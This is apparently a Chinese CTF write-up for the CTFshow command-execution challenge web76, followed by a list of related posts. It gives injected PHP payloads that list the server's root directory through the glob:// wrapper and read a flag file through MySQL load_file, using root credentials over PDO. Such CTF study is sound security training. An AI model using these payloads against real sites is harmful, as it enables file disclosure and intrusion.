CTFshow 命令执行 web76
目录
- 源码
- 思路
- 题解
- 总结
源码
Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 24
你要上天吗?
思路
和上题一样
题解
用glob协议读取根目录
c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');} exit(0);?>尝试下uaf脚本,发现提示UAF failed用mysql的load_file读取文件
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36d.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);
总结
水题
CTFshow 命令执行 web76相关推荐
- CTFshow——命令执行
CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...
- CTFshow命令执行29-123
命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...
- CTFshow 命令执行 web72
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
- [CTFSHOW]命令执行
文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...
- ctfshow 命令执行 web29-web77 web118-122 web124 wp
南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...
- ctfshow命令执行篇
web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...
- [CTFSHOW]命令执行55-74
web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...
- ctfshow命令执行(持续更新,已更至web39)
做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...
- CTFshow 命令执行 web56
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
最新文章
- Zebra ZE500打印机常见问题指南
- 安装Qt creator时出现 无法定位程序输入点_except1 于动态链接库MSVCR120.dll上
- dTree三级树形菜单
- Session.Abandon和Session.Clear有何不同
- 移民申请--申请澳大利亚技术移民的职业评估有技巧(2)
- mysql 实验_实验二 MySQL 实验.doc
- vue项目创建,redis列表字典操作,django用redis的第二种方法
- 简历不会做?集设网社区带来精致的个人网站供你参考
- php 学习编译扩展
- 14.Excel vba开发-随机点名
- 笔记_python库jpype安装和使用,及如何打包java程序供Python调用
- 小米路由器显示DNS服务器设置错误,小米路由器dns异常怎么修复
- 阿里云——零基础入门语音识别——食物声音识别——代码跑通及解析
- 利用canvas和vue_qrcodes生成带二维码头像的海报(一)
- 装甲逆袭-加载NPC
- Mysql 脚本创建触发器报错 1064 42000
- (13.1.3.10)PMBOK之三:十大知识领域之相关方管理
- 3D美术人员Technical Artist(TA技术美术)的学习之旅(2)
- github支持php_github怎么使用
- mysql 频繁连接中断_记一次网络原因导致的mysql连接中断问题(druid)